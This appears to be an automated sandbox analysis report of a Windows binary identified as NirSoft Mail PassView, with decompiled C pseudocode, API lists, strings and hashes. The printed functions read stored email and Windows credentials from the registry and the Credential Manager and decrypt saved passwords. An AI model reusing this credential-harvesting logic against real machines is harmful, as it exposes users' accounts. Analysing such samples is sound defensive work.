                                                                        								WideCharToMultiByte(0, 0, _v20, _v24,  &_v556, 0xff, 0, 0);
                                                                        								 *((intOrPtr*)( *_a4))(_t85);
                                                                        								LocalFree(_v20);
                                                                        								_t84 = 0;
                                                                        							}
                                                                        						}
                                                                        						RegCloseKey(_v16);
                                                                        					}
                                                                        					_v8 = _v8 + 1;
                                                                        					_push(0xff);
                                                                        					_push( &_v300);
                                                                        					_push(_v8);
                                                                        				}
                                                                        				return RegCloseKey(_a16);
                                                                        			}
























                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                        • memset.MSVCRT ref: 0040D743
                                                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040D770
                                                                        • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040D799
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040D812
                                                                        • LocalFree.KERNEL32(?), ref: 0040D825
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040D830
                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                        • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                        • API String ID: 551151806-1288872324
                                                                        • Opcode ID: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                        • Instruction ID: ba0b8c8cecfa7ea512c31dd79fcda3fb233e403caecda4e29e00fc0c4110e127
                                                                        • Opcode Fuzzy Hash: d3552b054e42a9a62031a540664540df19a8533d219857e9c55738ce323a5c80
                                                                        • Instruction Fuzzy Hash: 864129B2900209AFDB11DF95DD84EEFBBBCEB48344F0041A6FA15E2150DA749A94CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 56%
                                                                        			E004080A3(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
                                                                        				void _v4103;
                                                                        				char _v4104;
                                                                        				char _t30;
                                                                        				struct HMENU__* _t32;
                                                                        				char _t39;
                                                                        				void* _t42;
                                                                        				struct HWND__* _t43;
                                                                        				struct HMENU__* _t48;
                                                                        
                                                                        				_t42 = __edi;
                                                                        				_t38 = __ecx;
                                                                        				E004118A0(0x1004, __ecx);
                                                                        				_t55 = _a8 - 4;
                                                                        				if(_a8 != 4) {
                                                                        					__eflags = _a8 - 5;
                                                                        					if(_a8 == 5) {
                                                                        						_t39 =  *0x417488;
                                                                        						__eflags = _t39;
                                                                        						if(_t39 == 0) {
                                                                        							L8:
                                                                        							_push(_t42);
                                                                        							sprintf(0x4172c0, "dialog_%d", _a12);
                                                                        							_t43 = CreateDialogParamA(_a4, _a12, 0, E0040809E, 0);
                                                                        							_v4104 = 0;
                                                                        							memset( &_v4103, 0, 0x1000);
                                                                        							GetWindowTextA(_t43,  &_v4104, 0x1000);
                                                                        							__eflags = _v4104;
                                                                        							if(__eflags != 0) {
                                                                        								E00407E55(__eflags, "caption",  &_v4104);
                                                                        							}
                                                                        							EnumChildWindows(_t43, E00407FEB, 0);
                                                                        							DestroyWindow(_t43);
                                                                        						} else {
                                                                        							while(1) {
                                                                        								_t30 =  *_t39;
                                                                        								__eflags = _t30;
                                                                        								if(_t30 == 0) {
                                                                        									goto L8;
                                                                        								}
                                                                        								__eflags = _t30 - _a12;
                                                                        								if(_t30 != _a12) {
                                                                        									_t39 = _t39 + 4;
                                                                        									__eflags = _t39;
                                                                        									continue;
                                                                        								}
                                                                        								goto L11;
                                                                        							}
                                                                        							goto L8;
                                                                        						}
                                                                        						L11:
                                                                        					}
                                                                        				} else {
                                                                        					sprintf(0x4172c0, "menu_%d", _a12);
                                                                        					_t32 = LoadMenuA(_a4, _a12);
                                                                        					 *0x4171b4 =  *0x4171b4 & 0x00000000;
                                                                        					_t48 = _t32;
                                                                        					_push(1);
                                                                        					_push(_t48);
                                                                        					_push(_a12);
                                                                        					E00407EFB(_t38, _t55);
                                                                        					DestroyMenu(_t48);
                                                                        				}
                                                                        				return 1;
                                                                        			}












                                                                        APIs
                                                                        • sprintf.MSVCRT ref: 004080C4
                                                                        • LoadMenuA.USER32 ref: 004080D2
                                                                          • Part of subcall function 00407EFB: GetMenuItemCount.USER32 ref: 00407F10
                                                                          • Part of subcall function 00407EFB: memset.MSVCRT ref: 00407F31
                                                                          • Part of subcall function 00407EFB: GetMenuItemInfoA.USER32 ref: 00407F6C
                                                                          • Part of subcall function 00407EFB: strchr.MSVCRT ref: 00407F83
                                                                        • DestroyMenu.USER32(00000000), ref: 004080F0
                                                                        • sprintf.MSVCRT ref: 00408134
                                                                        • CreateDialogParamA.USER32(?,00000000,00000000,0040809E,00000000), ref: 00408149
                                                                        • memset.MSVCRT ref: 00408165
                                                                        • GetWindowTextA.USER32 ref: 00408176
                                                                        • EnumChildWindows.USER32 ref: 0040819E
                                                                        • DestroyWindow.USER32(00000000), ref: 004081A5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                        • String ID: caption$dialog_%d$menu_%d
                                                                        • API String ID: 3259144588-3822380221
                                                                        • Opcode ID: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                        • Instruction ID: 30012a8f5e5a5bdbe68f816da8837f1ba63c4ed8b40bd3c0dd12f77501d21500
                                                                        • Opcode Fuzzy Hash: 6243cf7790bf93336ac36a7af399e3403135f66e693ef013e884cab4c931bc33
                                                                        • Instruction Fuzzy Hash: 14212172544248BBDB22AF60DD41EEF3B78EF05305F00407AFA41A2190DABC9DA58B6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040E056() {
                                                                        				void* _t1;
                                                                        				_Unknown_base(*)()* _t2;
                                                                        				struct HINSTANCE__* _t4;
                                                                        
                                                                        				if( *0x417514 != 0) {
                                                                        					return _t1;
                                                                        				}
                                                                        				_t2 = GetModuleHandleA("kernel32.dll");
                                                                        				_t4 = _t2;
                                                                        				if(_t4 == 0) {
                                                                        					L9:
                                                                        					return _t2;
                                                                        				}
                                                                        				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                        				 *0x416fe0 = _t2;
                                                                        				if(_t2 != 0) {
                                                                        					_t2 = GetProcAddress(_t4, "Module32First");
                                                                        					 *0x416fd8 = _t2;
                                                                        					if(_t2 != 0) {
                                                                        						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                        						 *0x416fd4 = _t2;
                                                                        						if(_t2 != 0) {
                                                                        							_t2 = GetProcAddress(_t4, "Process32First");
                                                                        							 *0x416e6c = _t2;
                                                                        							if(_t2 != 0) {
                                                                        								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                        								 *0x416fcc = _t2;
                                                                        								if(_t2 != 0) {
                                                                        									 *0x417514 = 1;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				goto L9;
                                                                        			}







                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040DD19), ref: 0040E065
                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E07E
                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E08F
                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E0A0
                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E0B1
                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E0C2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                        • API String ID: 667068680-3953557276
                                                                        • Opcode ID: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                        • Instruction ID: 921299a9b586d994e9bf5e85ab2a2688844625279e80e39ff2614b99c2d6d575
                                                                        • Opcode Fuzzy Hash: 5922207fa155356ca208c5dc00e328b28cc838d796c506d44ffc4ba24ef585aa
                                                                        • Instruction Fuzzy Hash: 8DF06D70A45222A9C320CB266D00FFA3DA85A44B81B15843BE900F1694DBF8D5528B7C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404647(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
                                                                        				void* __esi;
                                                                        				struct HINSTANCE__* _t12;
                                                                        				struct HINSTANCE__** _t23;
                                                                        
                                                                        				_t23 = __eax;
                                                                        				E004046C2(__eax);
                                                                        				_t12 = LoadLibraryA("advapi32.dll");
                                                                        				 *_t23 = _t12;
                                                                        				if(_t12 != 0) {
                                                                        					_t23[2] = GetProcAddress(_t12, "CredReadA");
                                                                        					_t23[3] = GetProcAddress( *_t23, "CredFree");
                                                                        					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
                                                                        					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
                                                                        					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
                                                                        					if(_t23[2] == 0 || _t23[3] == 0) {
                                                                        						E004046C2(_t23);
                                                                        					} else {
                                                                        						_t23[1] = 1;
                                                                        					}
                                                                        				}
                                                                        				return _t23[1];
                                                                        			}






                                                                        APIs
                                                                          • Part of subcall function 004046C2: FreeLibrary.KERNEL32(?,0040464F,?,0040D601,80000001,73AFF420), ref: 004046C9
                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,73AFF420), ref: 00404654
                                                                        • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                        • GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                        • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                        • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                        • API String ID: 2449869053-4258758744
                                                                        • Opcode ID: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                        • Instruction ID: 1c6fa8d05b29e269fad2443f962c2e8eb3052cc88d23d174a3c6f0c0958544ff
                                                                        • Opcode Fuzzy Hash: 1dbd091348eef99b9c60bfcaa5dda145de35d3414d0ae1ecd7a3a02af1b4a616
                                                                        • Instruction Fuzzy Hash: 380121705447009AC730AF75CD08B46BAF4EF85704F218D2EE281A3690E7BE9491DF88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E00411015(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
                                                                        				void _v8;
                                                                        				void _v12;
                                                                        				void _v24;
                                                                        				char _v39;
                                                                        				void _v40;
                                                                        				char _v132;
                                                                        				void _v1156;
                                                                        				void _v1172;
                                                                        				char _v1180;
                                                                        				void _v1187;
                                                                        				char _v1188;
                                                                        				void _v2228;
                                                                        				void _v2243;
                                                                        				void _v2244;
                                                                        				void _v3267;
                                                                        				char _v3268;
                                                                        				void _v4291;
                                                                        				char _v4292;
                                                                        				char _v5340;
                                                                        				void _v5347;
                                                                        				char _v5348;
                                                                        				char _v6116;
                                                                        				char _v7136;
                                                                        				void _v7140;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				int _t86;
                                                                        				void* _t109;
                                                                        				void* _t122;
                                                                        				void* _t135;
                                                                        				char _t156;
                                                                        				signed char _t168;
                                                                        				signed int _t171;
                                                                        				intOrPtr _t177;
                                                                        				signed int _t183;
                                                                        				void* _t185;
                                                                        
                                                                        				_t171 = __edx;
                                                                        				E004118A0(0x1be4, __ecx);
                                                                        				_t156 = 0;
                                                                        				_v3268 = 0;
                                                                        				memset( &_v3267, 0, 0x3ff);
                                                                        				_a8 = E00410E8A(_a8,  &_v3268);
                                                                        				_t86 = strlen(_a4);
                                                                        				_v8 = _t86;
                                                                        				if(_a8 > 4) {
                                                                        					_t193 = _t86;
                                                                        					if(_t86 > 0) {
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsb");
                                                                        						_v2244 = 0;
                                                                        						memset( &_v2243, 0, 0x41e);
                                                                        						_v1188 = 0;
                                                                        						memset( &_v1187, 0, 0x41e);
                                                                        						_v5348 = 0;
                                                                        						memset( &_v5347, 0, 0x41e);
                                                                        						_v40 = 0;
                                                                        						asm("stosd");
                                                                        						asm("stosd");
                                                                        						asm("stosd");
                                                                        						asm("stosw");
                                                                        						asm("stosb");
                                                                        						_v4292 = 0;
                                                                        						memset( &_v4291, 0, 0x3ff);
                                                                        						E0040BC49( &_v132);
                                                                        						E0040BC6D(_v8,  &_v132, _a4);
                                                                        						_t181 =  &_v132;
                                                                        						E0040BD0B( &_v39,  &_v132,  &_v2244);
                                                                        						memcpy( &_v2228,  &_v24, 8);
                                                                        						E0040BC49( &_v132);
                                                                        						_push( &_v2244);
                                                                        						_t109 = 0x18;
                                                                        						E0040BC6D(_t109,  &_v132);
                                                                        						E0040BD0B( &_v39, _t181,  &_v1188);
                                                                        						memcpy( &_v1172,  &_v2244, 0x10);
                                                                        						memcpy( &_v1156,  &_v24, 8);
                                                                        						E0040BC49(_t181);
                                                                        						_push( &_v1188);
                                                                        						_t122 = 0x28;
                                                                        						E0040BC6D(_t122, _t181);
                                                                        						E0040BD0B( &_v39, _t181,  &_v5348);
                                                                        						E0040535A( &_v6116, _t193,  &_v1180,  &_v5348);
                                                                        						E004053D6( &_v5340,  &_v1188,  &_v4292,  &_v6116);
                                                                        						_t177 = _a8;
                                                                        						asm("cdq");
                                                                        						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
                                                                        						_a4 = 0;
                                                                        						if(_t183 > 0) {
                                                                        							do {
                                                                        								E004053D6(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
                                                                        								_a4 =  &(_a4[1]);
                                                                        							} while (_a4 < _t183);
                                                                        							_t177 = _a8;
                                                                        						}
                                                                        						_t135 = 0;
                                                                        						if(_t177 > _t156) {
                                                                        							do {
                                                                        								_t168 =  *(_t185 + _t135 - 0x10c0) ^  *(_t185 + _t135 - 0xcc0);
                                                                        								_t135 = _t135 + 1;
                                                                        								 *(_t185 + _t135 - 0x1be1) = _t168;
                                                                        							} while (_t135 < _t177);
                                                                        						}
                                                                        						 *((char*)(_t185 + _t177 - 0x1be0)) = _t156;
                                                                        						strcpy(_a12,  &_v7136);
                                                                        						E0040BC49( &_v132);
                                                                        						_t67 = _t177 - 4; // 0x0
                                                                        						E0040BC6D(_t67,  &_v132, _a12);
                                                                        						E0040BD0B(_t177,  &_v132,  &_v40);
                                                                        						memcpy( &_v8,  &_v40, 4);
                                                                        						memcpy( &_v12,  &_v7140, 4);
                                                                        						_t156 = 1;
                                                                        						 *_a16 = 0 | _v8 == _v12;
                                                                        					}
                                                                        				}
                                                                        				return _t156;
                                                                        			}







































                                                                        APIs
                                                                        • memset.MSVCRT ref: 0041103A
                                                                          • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                        • strlen.MSVCRT ref: 00411056
                                                                        • memset.MSVCRT ref: 00411090
                                                                        • memset.MSVCRT ref: 004110A4
                                                                        • memset.MSVCRT ref: 004110B8
                                                                        • memset.MSVCRT ref: 004110DE
                                                                          • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                          • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                          • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                          • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                          • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                        • memcpy.MSVCRT ref: 00411115
                                                                          • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                          • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                          • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                        • memcpy.MSVCRT ref: 00411151
                                                                        • memcpy.MSVCRT ref: 00411163
                                                                        • strcpy.MSVCRT(?,?), ref: 0041123A
                                                                        • memcpy.MSVCRT ref: 0041126B
                                                                        • memcpy.MSVCRT ref: 0041127D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memcpymemset$strlen$strcpy
                                                                        • String ID: salu
                                                                        • API String ID: 2660478486-4177317985
                                                                        • Opcode ID: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                        • Instruction ID: 480a48fc981763c339c301d1addb7ab339a070bf665ce532ed27993edd9122c1
                                                                        • Opcode Fuzzy Hash: ae1d07347fa3aa89f5fcc6141a6fc90f028ff7b9ab687112944546eff88cf5b8
                                                                        • Instruction Fuzzy Hash: A4717F7190011DAADB10EBA9CC819DEB7BDFF08348F1445BAF609E7151DB749B888F94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E00403E87(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr* _v8;
                                                                        				char _v76;
                                                                        				void _v1099;
                                                                        				char _v1100;
                                                                        				void _v2123;
                                                                        				char _v2124;
                                                                        				void _v3147;
                                                                        				char _v3148;
                                                                        				char _v4172;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				void* _t36;
                                                                        				void* _t37;
                                                                        				void* _t48;
                                                                        				void* _t55;
                                                                        				intOrPtr* _t56;
                                                                        				signed int _t58;
                                                                        				intOrPtr* _t63;
                                                                        				void* _t70;
                                                                        				void* _t71;
                                                                        
                                                                        				_t56 = __ecx;
                                                                        				E004118A0(0x1048, __ecx);
                                                                        				_t63 = _t56;
                                                                        				_v8 = _t63;
                                                                        				E00405EFD(_a4, "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                        				_v1100 = 0;
                                                                        				memset( &_v1099, 0, 0x3ff);
                                                                        				_v3148 = 0;
                                                                        				memset( &_v3147, 0, 0x3ff);
                                                                        				_v2124 = 0;
                                                                        				memset( &_v2123, 0, 0x3ff);
                                                                        				_t71 = _t70 + 0x2c;
                                                                        				if( *0x417308 != 0) {
                                                                        					sprintf( &_v3148, "<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>", 0x417308);
                                                                        					_t71 = _t71 + 0xc;
                                                                        				}
                                                                        				if( *0x417304 != 0) {
                                                                        					strcpy( &_v1100, "<table dir=\"rtl\"><tr><td>\r\n");
                                                                        				}
                                                                        				_t36 =  *((intOrPtr*)( *_t63 + 0x1c))();
                                                                        				_t58 = 0x10;
                                                                        				_push(_t36);
                                                                        				_t37 = memcpy( &_v76, "<html><head>%s<title>%s</title></head>\r\n<body>\r\n%s <h3>%s</h3>\r\n", _t58 << 2);
                                                                        				asm("movsb");
                                                                        				sprintf( &_v4172,  &_v76,  &_v3148, _t37,  &_v1100);
                                                                        				E00405EFD(_a4,  &_v4172);
                                                                        				_push("Mail PassView");
                                                                        				_t55 = 6;
                                                                        				_push(E004078FF(_t55));
                                                                        				sprintf( &_v2124, "<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                        				_t48 = E00405EFD(_a4,  &_v2124);
                                                                        				_t78 = _a8 - 4;
                                                                        				if(_a8 == 4) {
                                                                        					return E004097E6(_v8, _t78, _a4);
                                                                        				}
                                                                        				return _t48;
                                                                        			}
























                                                                        APIs
                                                                          • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                          • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                        • memset.MSVCRT ref: 00403EBF
                                                                        • memset.MSVCRT ref: 00403ED3
                                                                        • memset.MSVCRT ref: 00403EE7
                                                                        • sprintf.MSVCRT ref: 00403F08
                                                                        • strcpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F24
                                                                        • sprintf.MSVCRT ref: 00403F5B
                                                                        • sprintf.MSVCRT ref: 00403F8C
                                                                        Strings
                                                                        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F36
                                                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F02
                                                                        • <table dir="rtl"><tr><td>, xrefs: 00403F1E
                                                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E97
                                                                        • Mail PassView, xrefs: 00403F72
                                                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F86
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memsetsprintf$FileWritestrcpystrlen
                                                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$Mail PassView
                                                                        • API String ID: 1043021993-495024357
                                                                        • Opcode ID: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                        • Instruction ID: b86957a5e19b08f75c710fe46d40d6f019605627493d012667a382a844d4f915
                                                                        • Opcode Fuzzy Hash: 9ab723875cfdb90570c6b26727e8dc31f2cea9ea6bbea43a89162690f7ebea04
                                                                        • Instruction Fuzzy Hash: A93196B2C40118BADB11EB55DC82EDE7BACEF44304F0045A7B60DA3151DE786FC88BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404288(intOrPtr __ecx, void* __esi, void* __fp0, wchar_t** _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v280;
                                                                        				char _v408;
                                                                        				intOrPtr _v412;
                                                                        				char _v796;
                                                                        				intOrPtr _v800;
                                                                        				char _v928;
                                                                        				char _v940;
                                                                        				wchar_t* _t23;
                                                                        				char* _t41;
                                                                        				wchar_t** _t59;
                                                                        				void* _t76;
                                                                        
                                                                        				_t76 = __fp0;
                                                                        				_t59 = _a4;
                                                                        				_t23 =  *_t59;
                                                                        				_v8 = __ecx;
                                                                        				if(_t23 != 0 && _t59[1] != 0 && _t59[2] != 0 && wcsstr(_t23, L"www.google.com") != 0) {
                                                                        					E004021D8( &_v940);
                                                                        					_v800 = 7;
                                                                        					_v412 = 3;
                                                                        					WideCharToMultiByte(0, 0, _t59[1], 0xffffffff,  &_v408, 0x7f, 0, 0);
                                                                        					WideCharToMultiByte(0, 0, _t59[2], 0xffffffff,  &_v280, 0x7f, 0, 0);
                                                                        					strcpy( &_v928,  &_v408);
                                                                        					strcpy( &_v796,  &_v408);
                                                                        					if(strchr( &_v796, 0x40) == 0 && strlen( &_v408) + 0xa < 0x7f) {
                                                                        						sprintf( &_v796, "%s@gmail.com",  &_v408);
                                                                        					}
                                                                        					_t41 = strchr( &_v928, 0x40);
                                                                        					if(_t41 != 0) {
                                                                        						 *_t41 = 0;
                                                                        					}
                                                                        					E00402407( &_v940, _t76, _v8 + 0xfffff788);
                                                                        				}
                                                                        				return 1;
                                                                        			}
















                                                                        APIs
                                                                        • wcsstr.MSVCRT ref: 004042BD
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404304
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404318
                                                                        • strcpy.MSVCRT(?,?), ref: 00404328
                                                                        • strcpy.MSVCRT(?,?,?,?), ref: 0040433B
                                                                        • strchr.MSVCRT ref: 00404349
                                                                        • strlen.MSVCRT ref: 0040435D
                                                                        • sprintf.MSVCRT ref: 0040437E
                                                                        • strchr.MSVCRT ref: 0040438F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWidestrchrstrcpy$sprintfstrlenwcsstr
                                                                        • String ID: %s@gmail.com$www.google.com
                                                                        • API String ID: 1359934567-4070641962
                                                                        • Opcode ID: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                        • Instruction ID: 90bd0330eeb49ee3a27dc93359d6b9986b282e86ae315167fefd13048bcd18fc
                                                                        • Opcode Fuzzy Hash: 8108c03dee5360a7f6a3e2f925f6b83e3505abd913d650f45db378c2ca998167
                                                                        • Instruction Fuzzy Hash: 793188B290021D7FDB21D791DD81FDAB3ACDB44354F1005A7F709E2181D678AF858A58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E0040827A(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, char* _a8) {
                                                                        				void _v4103;
                                                                        				char _v4104;
                                                                        				int _t21;
                                                                        				int _t28;
                                                                        				void* _t35;
                                                                        
                                                                        				_t35 = __eflags;
                                                                        				E004118A0(0x1004, __ecx);
                                                                        				strcpy(0x4171b8, _a8);
                                                                        				strcpy(0x4172c0, "general");
                                                                        				E00407E55(_t35, "TranslatorName", 0x412466);
                                                                        				E00407E55(_t35, "TranslatorURL", 0x412466);
                                                                        				EnumResourceNamesA(_a4, 4, E004080A3, 0);
                                                                        				EnumResourceNamesA(_a4, 5, E004080A3, 0);
                                                                        				strcpy(0x4172c0, "strings");
                                                                        				_t28 = 0;
                                                                        				_v4104 = 0;
                                                                        				memset( &_v4103, 0, 0x1000);
                                                                        				do {
                                                                        					_t21 = LoadStringA(_a4, _t28,  &_v4104, 0x1000);
                                                                        					if(_t21 > 0) {
                                                                        						_t21 = E00407EC3(_t28,  &_v4104);
                                                                        					}
                                                                        					_t28 = _t28 + 1;
                                                                        				} while (_t28 <= 0xffff);
                                                                        				 *0x4171b8 = 0;
                                                                        				return _t21;
                                                                        			}









                                                                        APIs
                                                                        • strcpy.MSVCRT(004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 00408292
                                                                        • strcpy.MSVCRT(004172C0,general,004171B8,00000000,00000000,00000000,?,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082A2
                                                                          • Part of subcall function 00407E55: memset.MSVCRT ref: 00407E7A
                                                                          • Part of subcall function 00407E55: GetPrivateProfileStringA.KERNEL32(004172C0,00000104,00412466,?,00001000,004171B8), ref: 00407E9E
                                                                          • Part of subcall function 00407E55: WritePrivateProfileStringA.KERNEL32(004172C0,?,?,004171B8), ref: 00407EB5
                                                                        • EnumResourceNamesA.KERNEL32(00000104,00000004,004080A3,00000000), ref: 004082D8
                                                                        • EnumResourceNamesA.KERNEL32(00000104,00000005,004080A3,00000000), ref: 004082E2
                                                                        • strcpy.MSVCRT(004172C0,strings,?,004083AB,00000000,?,00000000,00000104,?), ref: 004082EA
                                                                        • memset.MSVCRT ref: 00408306
                                                                        • LoadStringA.USER32 ref: 0040831A
                                                                          • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                        Strings
